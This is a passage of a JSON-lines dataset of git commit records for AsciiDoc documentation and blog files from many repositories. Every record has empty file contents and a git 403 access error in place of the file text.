{"commit":"dd80ec49f0cb3b08bfc04745045eb4cd8651ad14","subject":"0.10.0.CR2 release announcement","message":"0.10.0.CR2 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-09-26-debezium-0-10-0-cr2-released.adoc","new_file":"blog\/2019-09-26-debezium-0-10-0-cr2-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4be770520bec015dcd66c0ab211d48de6e0a6fbf","subject":"Create api.adoc","message":"Create api.adoc","repos":"restSampleServices\/node-service,restSampleServices\/node-service,restSampleServices\/node-service","old_file":"doc\/api.adoc","new_file":"doc\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/restSampleServices\/node-service.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab41671d6d3b319a2c7911b97b7014a840335895","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/01\/21\/deref.adoc","new_file":"content\/news\/2022\/01\/21\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b6a502a6d1e481e91271fb1813b1a6d9c3942ecc","subject":"Update 2015-05-24-Mi-primer-articulo-Concepto-sobre-HubPress.adoc","message":"Update 2015-05-24-Mi-primer-articulo-Concepto-sobre-HubPress.adoc","repos":"CarlosRPO\/carlosrpo.github.io,CarlosRPO\/carlosrpo.github.io,CarlosRPO\/carlosrpo.github.io","old_file":"_posts\/2015-05-24-Mi-primer-articulo-Concepto-sobre-HubPress.adoc","new_file":"_posts\/2015-05-24-Mi-primer-articulo-Concepto-sobre-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CarlosRPO\/carlosrpo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f861a88ce09644b11ea0dc48057dd90ec6ba737d","subject":"Update 2015-05-28-Retour-sur-le-Salon-des-Vins-de-Loire-2015.adoc","message":"Update 2015-05-28-Retour-sur-le-Salon-des-Vins-de-Loire-2015.adoc","repos":"quentindemolliens\/quentindemolliens.github.io,quentindemolliens\/quentindemolliens.github.io,quentindemolliens\/quentindemolliens.github.io,quentindemolliens\/quentindemolliens.github.io","old_file":"_posts\/2015-05-28-Retour-sur-le-Salon-des-Vins-de-Loire-2015.adoc","new_file":"_posts\/2015-05-28-Retour-sur-le-Salon-des-Vins-de-Loire-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quentindemolliens\/quentindemolliens.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c717de11f7faa9c005e207ff7b27cb4f33cc67f7","subject":"Note snippet: First time you run a grails command","message":"Note snippet: First time you run a grails command\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-firstTimeYouRunGrailsCommand.adoc","new_file":"src\/main\/docs\/common-firstTimeYouRunGrailsCommand.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3bcb7a8f097b0466d0cee548c5ecf9228daa38d0","subject":"Update 2018-11-28-Best-practices-for-Event-Sourcing.adoc","message":"Update 2018-11-28-Best-practices-for-Event-Sourcing.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-11-28-Best-practices-for-Event-Sourcing.adoc","new_file":"_posts\/2018-11-28-Best-practices-for-Event-Sourcing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdd5b735f4fb5ce73c77e14268ef44edbdb875a1","subject":"Added spel-language to Gitbook","message":"Added spel-language to Gitbook\n","repos":"rmarting\/camel,christophd\/camel,bgaudaen\/camel,driseley\/camel,kevinearls\/camel,lburgazzoli\/apache-camel,gautric\/camel,kevinearls\/camel,rmarting\/camel,NickCis\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,rmarting\/camel,neoramon\/camel,jonmcewen\/camel,adessaigne\/camel,pkletsko\/camel,chirino\/camel,onders86\/camel,lburgazzoli\/camel,lburgazzoli\/apache-camel,jkorab\/camel,isavin\/camel,veithen\/camel,sirlatrom\/camel,w4tson\/camel,gnodet\/camel,CodeSmell\/camel,christophd\/camel,tkopczynski\/camel,punkhorn\/camel-upstream,ssharma\/camel,CodeSmell\/camel,neoramon\/camel,Thopap\/camel,onders86\/camel,rmarting\/camel,Thopap\/camel,nboukhed\/camel,objectiser\/camel,jonmcewen\/camel,akhettar\/camel,RohanHart\/camel,jarst\/camel,jonmcewen\/camel,onders86\/camel,nicolaferraro\/camel,apache\/camel,akhettar\/camel,ssharma\/camel,isavin\/camel,hqstevenson\/camel,nikhilvibhav\/camel,Thopap\/camel,apache\/camel,RohanHart\/camel,alvinkwekel\/camel,yuruki\/camel,mcollovati\/camel,sverkera\/camel,pkletsko\/camel,driseley\/camel,gnodet\/camel,driseley\/camel,ullgren\/camel,sverkera\/camel,hqstevenson\/camel,jarst\/camel,prashant2402\/camel,nikhilvibhav\/camel,tadayosi\/camel,jarst\/camel,yuruki\/camel,JYBESSON\/camel,mcollovati\/camel,w4tson\/camel,RohanHart\/camel,lburgazzoli\/camel,prashant2402\/camel,tdiesler\/camel,pax95\/camel,gilfernandes\/camel,anton-k11\/camel,sverkera\/camel,tadayosi\/camel,pmoerenhout\/camel,snurmine\/camel,drsquidop\/camel,drsquidop\/camel,RohanHart\/camel,anton-k11\/camel,snurmine\/camel,cunningt\/camel,nboukhed\/camel,neoramon\/camel,adessaigne\/camel,scranton\/camel,jarst\/camel,veithen\/camel,Thopap\/camel,DariusX\/camel,akhettar\/camel,gilfernandes\/camel,dmvolod\/camel,scranton\/camel,driseley\/camel,tlehoux\/camel,allancth\/camel,nicolaferraro\/camel,jkorab\/camel,ssharma\/camel,pkletsko\/camel,bgaudaen\/camel,akhettar\/camel,objectiser\/camel,chirino\/camel,veithen\/camel,snurmine\/camel,rmarting\/camel,ssharma\/camel,scranton\/camel,jonmcewen\/camel,akhettar\/camel,snurmine\/camel,RohanHart\/camel,Fabryprog\/camel,tkopczynski\/camel,scranton\/camel,allancth\/camel,anoordover\/camel,christophd\/camel,gnodet\/camel,pmoerenhout\/camel,adessaigne\/camel,drsquidop\/camel,cunningt\/camel,apache\/camel,christophd\/camel,bgaudaen\/camel,bgaudaen\/camel,ullgren\/camel,acartapanis\/camel,JYBESSON\/camel,chirino\/camel,acartapanis\/camel,nicolaferraro\/camel,lburgazzoli\/apache-camel,jamesnetherton\/camel,christophd\/camel,gautric\/camel,cunningt\/camel,davidkarlsen\/camel,allancth\/camel,dmvolod\/camel,gautric\/camel,kevinearls\/camel,bhaveshdt\/camel,dmvolod\/camel,zregvart\/camel,pkletsko\/camel,adessaigne\/camel,mgyongyosi\/camel,gilfernandes\/camel,cunningt\/camel,pax95\/camel,acartapanis\/camel,NickCis\/camel,nikhilvibhav\/camel,curso007\/camel,DariusX\/camel,Fabryprog\/camel,hqstevenson\/camel,punkhorn\/camel-upstream,bhaveshdt\/camel,sabre1041\/camel,bgaudaen\/camel,YoshikiHigo\/camel,anoordover\/camel,anton-k11\/camel,kevinearls\/camel,tlehoux\/camel,bhaveshdt\/camel,anoordover\/camel,w4tson\/camel,hqstevenson\/camel,jamesnetherton\/camel,sirlatrom\/camel,CodeSmell\/camel,kevinearls\/camel,ssharma\/camel,YoshikiHigo\/camel,chirino\/camel,YoshikiHigo\/camel,NickCis\/camel,jkorab\/camel,cunningt\/camel,gautric\/camel,curso007\/camel,nicolaferraro\/camel,drsquidop\/camel,dmvolod\/camel,lburgazzoli\/apache-camel,isavin\/camel,alvinkwekel\/camel,chirino\/camel,gnodet\/camel,allancth\/camel,hqstevenson\/camel,zregvart\/camel,NickCis\/camel,neoramon\/camel,w4tson\/camel,tkopczynski\/camel,prashant2402\/camel,pax95\/camel,RohanHart\/camel,apache\/camel,prashant2402\/camel,DariusX\/camel,allancth\/camel,w4tson\/camel,tlehoux\/camel,salikjan\/camel,bhaveshdt\/camel,sabre1041\/camel,curso007\/camel,lburgazzoli\/camel,Thopap\/camel,DariusX\/camel,sabre1041\/camel,tlehoux\/camel,ssharma\/camel,CodeSmell\/camel,neoramon\/camel,jarst\/camel,JYBESSON\/camel,tlehoux\/camel,lburgazzoli\/camel,mgyongyosi\/camel,sabre1041\/camel,YoshikiHigo\/camel,tkopczynski\/camel,JYBESSON\/camel,veithen\/camel,gilfernandes\/camel,dmvolod\/camel,onders86\/camel,dmvolod\/camel,lburgazzoli\/camel,gnodet\/camel,sverkera\/camel,anton-k11\/camel,onders86\/camel,yuruki\/camel,yuruki\/camel,mcollovati\/camel,mgyongyosi\/camel,tdiesler\/camel,YoshikiHigo\/camel,anoordover\/camel,tadayosi\/camel,cunningt\/camel,isavin\/camel,sabre1041\/camel,scranton\/camel,pax95\/camel,tadayosi\/camel,mgyongyosi\/camel,pkletsko\/camel,acartapanis\/camel,bhaveshdt\/camel,apache\/camel,pmoerenhout\/camel,bgaudaen\/camel,jamesnetherton\/camel,sirlatrom\/camel,yuruki\/camel,isavin\/camel,jarst\/camel,davidkarlsen\/camel,davidkarlsen\/camel,tdiesler\/camel,mgyongyosi\/camel,jamesnetherton\/camel,gilfernandes\/camel,lburgazzoli\/camel,jkorab\/camel,NickCis\/camel,JYBESSON\/camel,pmoerenhout\/camel,tdiesler\/camel,gautric\/camel,christophd\/camel,snurmine\/camel,apache\/camel,veithen\/camel,anoordover\/camel,YoshikiHigo\/camel,acartapanis\/camel,driseley\/camel,jamesnetherton\/camel,jkorab\/camel,zregvart\/camel,tkopczynski\/camel,anton-k11\/camel,NickCis\/camel,rmarting\/camel,punkhorn\/camel-upstream,tdiesler\/camel,allancth\/camel,gautric\/camel,onders86\/camel,akhettar\/camel,nboukhed\/camel,punkhorn\/camel-upstream,sirlatrom\/camel,Fabryprog\/camel,chirino\/camel,sirlatrom\/camel,pkletsko\/camel,mcollovati\/camel,jkorab\/camel,curso007\/camel,bhaveshdt\/camel,prashant2402\/camel,nboukhed\/camel,mgyongyosi\/camel,driseley\/camel,gilfernandes\/camel,ullgren\/camel,sabre1041\/camel,zregvart\/camel,veithen\/camel,tdiesler\/camel,JYBESSON\/camel,objectiser\/camel,ullgren\/camel,curso007\/camel,objectiser\/camel,tlehoux\/camel,nboukhed\/camel,davidkarlsen\/camel,lburgazzoli\/apache-camel,nboukhed\/camel,tkopczynski\/camel,jamesnetherton\/camel,drsquidop\/camel,acartapanis\/camel,sverkera\/camel,prashant2402\/camel,Thopap\/camel,snurmine\/camel,neoramon\/camel,pmoerenhout\/camel,sirlatrom\/camel,adessaigne\/camel,lburgazzoli\/apache-camel,Fabryprog\/camel,alvinkwekel\/camel,scranton\/camel,curso007\/camel,isavin\/camel,anton-k11\/camel,pax95\/camel,w4tson\/camel,hqstevenson\/camel,kevinearls\/camel,anoordover\/camel,drsquidop\/camel,salikjan\/camel,pax95\/camel,jonmcewen\/camel,alvinkwekel\/camel,tadayosi\/camel,yuruki\/camel,jonmcewen\/camel,sverkera\/camel,tadayosi\/camel,adessaigne\/camel","old_file":"components\/camel-spring\/src\/main\/docs\/spel-language.adoc","new_file":"components\/camel-spring\/src\/main\/docs\/spel-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab9885db58502c53c56ff4980f155171124ce168","subject":"y2b create post Holiday Deal Box + $50,000 Giveaway","message":"y2b create post Holiday Deal Box + $50,000 Giveaway","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-25-Holiday-Deal-Box--50000-Giveaway.adoc","new_file":"_posts\/2016-11-25-Holiday-Deal-Box--50000-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"448176bd9cdc32f846c0dbb1c50e243b718b5033","subject":"y2b create post Check Out This Crazy Gadget I Found...","message":"y2b create post Check Out This Crazy Gadget I Found...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-21-Check-Out-This-Crazy-Gadget-I-Found.adoc","new_file":"_posts\/2017-05-21-Check-Out-This-Crazy-Gadget-I-Found.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5fd08ba77b9cb7d85b89615995bdc34b8b88133f","subject":"job #12330 add minutes from initial review","message":"job #12330 add minutes from initial review\n","repos":"xtuml\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint","old_file":"doc-bridgepoint\/review-minutes\/12330_textual_xtuml.adoc","new_file":"doc-bridgepoint\/review-minutes\/12330_textual_xtuml.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortlandstarrett\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"602a1e9d0a5db268cac89c88f16f4110cc49574a","subject":"Update 2016-12-01-Mediashare-Chat.adoc","message":"Update 2016-12-01-Mediashare-Chat.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Mediashare-Chat.adoc","new_file":"_posts\/2016-12-01-Mediashare-Chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"099ab44a9ebe731bbb25362f65737bdb1f99d7eb","subject":"Update 2015-02-16-Razrabotka-i-tvorchestvo.adoc","message":"Update 2015-02-16-Razrabotka-i-tvorchestvo.adoc","repos":"alchapone\/alchapone.github.io,alchapone\/alchapone.github.io,alchapone\/alchapone.github.io","old_file":"_posts\/2015-02-16-Razrabotka-i-tvorchestvo.adoc","new_file":"_posts\/2015-02-16-Razrabotka-i-tvorchestvo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alchapone\/alchapone.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84d786f9c2bf754970a707ffd78531e8d6ddaf67","subject":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","message":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe4d71f147bc2939434a7fe3a6fd819c9fead402","subject":"Fixed missing file extension.","message":"Fixed missing file extension.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/wiki\/admonitions.adoc","new_file":"src\/docs\/asciidoc\/wiki\/admonitions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"b4244c72f5ff3a16d0216f1a41349c0c0deadfa3","subject":"add manually post","message":"add manually post\n","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2011-10-04-Day-one---Technical-Keynote.adoc","new_file":"_posts\/2011-10-04-Day-one---Technical-Keynote.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15cc4f53425f60910fbd705b93252509ab3084e0","subject":"Update 2017-10-20-Mac-Tableau-Desktop-Treasure-Data.adoc","message":"Update 2017-10-20-Mac-Tableau-Desktop-Treasure-Data.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-20-Mac-Tableau-Desktop-Treasure-Data.adoc","new_file":"_posts\/2017-10-20-Mac-Tableau-Desktop-Treasure-Data.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1c43aec54244c55e8305d57435c5d2c24fdb071","subject":"CAMEL-12053 - Generated docs for Camel-AWS-MQ","message":"CAMEL-12053 - Generated docs for Camel-AWS-MQ\n","repos":"dmvolod\/camel,kevinearls\/camel,tdiesler\/camel,apache\/camel,mcollovati\/camel,nicolaferraro\/camel,apache\/camel,gautric\/camel,onders86\/camel,punkhorn\/camel-upstream,rmarting\/camel,tdiesler\/camel,mcollovati\/camel,kevinearls\/camel,punkhorn\/camel-upstream,anoordover\/camel,apache\/camel,adessaigne\/camel,gnodet\/camel,curso007\/camel,dmvolod\/camel,ullgren\/camel,dmvolod\/camel,pmoerenhout\/camel,rmarting\/camel,curso007\/camel,ullgren\/camel,tadayosi\/camel,anoordover\/camel,gautric\/camel,anoordover\/camel,alvinkwekel\/camel,snurmine\/camel,curso007\/camel,onders86\/camel,cunningt\/camel,sverkera\/camel,cunningt\/camel,DariusX\/camel,sverkera\/camel,gnodet\/camel,jonmcewen\/camel,pax95\/camel,dmvolod\/camel,anoordover\/camel,pmoerenhout\/camel,curso007\/camel,rmarting\/camel,gautric\/camel,jamesnetherton\/camel,objectiser\/camel,apache\/camel,davidkarlsen\/camel,jamesnetherton\/camel,tadayosi\/camel,sverkera\/camel,akhettar\/camel,alvinkwekel\/camel,rmarting\/camel,curso007\/camel,akhettar\/camel,akhettar\/camel,tadayosi\/camel,davidkarlsen\/camel,nicolaferraro\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,zregvart\/camel,pax95\/camel,CodeSmell\/camel,gautric\/camel,ullgren\/camel,akhettar\/camel,christophd\/camel,gnodet\/camel,pax95\/camel,mcollovati\/camel,christophd\/camel,DariusX\/camel,alvinkwekel\/camel,cunningt\/camel,DariusX\/camel,apache\/camel,gnodet\/camel,christophd\/camel,gnodet\/camel,tdiesler\/camel,mcollovati\/camel,jonmcewen\/camel,alvinkwekel\/camel,CodeSmell\/camel,apache\/camel,jonmcewen\/camel,cunningt\/camel,christophd\/camel,jamesnetherton\/camel,onders86\/camel,gautric\/camel,jonmcewen\/camel,jamesnetherton\/camel,kevinearls\/camel,christophd\/camel,Fabryprog\/camel,kevinearls\/camel,DariusX\/camel,sverkera\/camel,dmvolod\/camel,cunningt\/camel,rmarting\/camel,curso007\/camel,onders86\/camel,Fabryprog\/camel,CodeSmell\/camel,CodeSmell\/camel,pmoerenhout\/camel,snurmine\/camel,pmoerenhout\/camel,dmvolod\/camel,onders86\/camel,punkhorn\/camel-upstream,objectiser\/camel,zregvart\/camel,onders86\/camel,snurmine\/camel,objectiser\/camel,jonmcewen\/camel,gautric\/camel,adessaigne\/camel,ullgren\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,tadayosi\/camel,christophd\/camel,davidkarlsen\/camel,tadayosi\/camel,pax95\/camel,punkhorn\/camel-upstream,pax95\/camel,adessaigne\/camel,adessaigne\/camel,pmoerenhout\/camel,adessaigne\/camel,nicolaferraro\/camel,rmarting\/camel,tdiesler\/camel,akhettar\/camel,snurmine\/camel,sverkera\/camel,jamesnetherton\/camel,kevinearls\/camel,zregvart\/camel,pax95\/camel,nikhilvibhav\/camel,adessaigne\/camel,objectiser\/camel,anoordover\/camel,sverkera\/camel,davidkarlsen\/camel,akhettar\/camel,cunningt\/camel,nicolaferraro\/camel,Fabryprog\/camel,anoordover\/camel,tdiesler\/camel,Fabryprog\/camel,nikhilvibhav\/camel,kevinearls\/camel,zregvart\/camel,snurmine\/camel,tadayosi\/camel,tdiesler\/camel,jonmcewen\/camel,snurmine\/camel","old_file":"components\/camel-aws\/src\/main\/docs\/aws-mq-component.adoc","new_file":"components\/camel-aws\/src\/main\/docs\/aws-mq-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e752bd6a29a8206042efc1748ab9ac4345c7b76","subject":"Update 2015-11-11-The-Horror.adoc","message":"Update 2015-11-11-The-Horror.adoc","repos":"Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io","old_file":"_posts\/2015-11-11-The-Horror.adoc","new_file":"_posts\/2015-11-11-The-Horror.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mr-IP-Kurtz\/mr-ip-kurtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01d39e14d89df4c6673dec6f34ac152cb418cdfe","subject":"Update 2016-11-05-Dear-Diary.adoc","message":"Update 2016-11-05-Dear-Diary.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b41029a152b91785d7999f8d4b1e9a431d224f76","subject":"Started working on the translation docs.","message":"Started working on the translation docs.\n","repos":"HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j","old_file":"manual\/src\/main\/resources\/community\/translating.asciidoc","new_file":"manual\/src\/main\/resources\/community\/translating.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HuangLS\/neo4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3e8431f45de1b1e1b880db0526ed21a5a62719b9","subject":"Update 2015-09-17-test.adoc","message":"Update 2015-09-17-test.adoc","repos":"stevenxzhou\/alex1007.github.io,stevenxzhou\/alex1007.github.io,stevenxzhou\/alex1007.github.io","old_file":"_posts\/2015-09-17-test.adoc","new_file":"_posts\/2015-09-17-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stevenxzhou\/alex1007.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c3d87fcb1b58ac8f945ac83e6c5fe7d3bab60bf","subject":"Update 2017-11-30-Look.adoc","message":"Update 2017-11-30-Look.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-11-30-Look.adoc","new_file":"_posts\/2017-11-30-Look.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f20da704eee609bab22a0cb5aeedb1b5d5f977fd","subject":"HawkularBTM 0.2.0.Final demo blog","message":"HawkularBTM 0.2.0.Final demo blog\n","repos":"jpkrohling\/hawkular.github.io,lzoubek\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/07\/22\/hawkular-btm-0.2.0-demo.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/07\/22\/hawkular-btm-0.2.0-demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"17dab842902047f71d57a0bb6bd226c8e86140cb","subject":"Update 2016-02-11-Descomplicando-gulp.adoc","message":"Update 2016-02-11-Descomplicando-gulp.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-11-Descomplicando-gulp.adoc","new_file":"_posts\/2016-02-11-Descomplicando-gulp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32224dab00c462b3c1712bce1402005796faa32a","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6389a3f41f008f6e13d03a9bac71cd06131cff46","subject":"Update 2017-02-02-The-Cost-of-Ember.adoc","message":"Update 